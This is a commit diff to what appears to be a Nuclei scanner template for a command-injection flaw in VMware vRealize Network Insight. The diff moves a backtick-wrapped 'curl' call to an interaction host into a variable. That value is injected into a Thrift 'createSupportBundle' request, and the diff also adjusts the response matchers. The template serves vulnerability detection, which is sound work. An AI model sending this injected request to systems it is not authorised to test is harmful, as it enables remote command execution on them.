commit
85762056d9
|
@ -24,6 +24,9 @@ info:
|
||||||
fofa-query: title="VMware vRealize Network Insight"
|
fofa-query: title="VMware vRealize Network Insight"
|
||||||
tags: cve,cve2023,vmware,rce,msf,vrealize,insight,oast
|
tags: cve,cve2023,vmware,rce,msf,vrealize,insight,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
cmd: "curl {{interactsh-url}}"
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -31,20 +34,27 @@ http:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-thrift
|
Content-Type: application/x-thrift
|
||||||
|
|
||||||
[1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl {{interactsh-url}}`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}]
|
[1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`{{cmd}}`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}]
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
|
||||||
part: interactsh_protocol
|
|
||||||
words:
|
|
||||||
- "http"
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- createSupportBundle
|
- '{"rec":'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "application/x-thrift"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Provided invalid node Id"
|
||||||
|
- "Invalid nodeId"
|
||||||
|
negative: true
|
||||||
|
|
Loading…
Reference in New Issue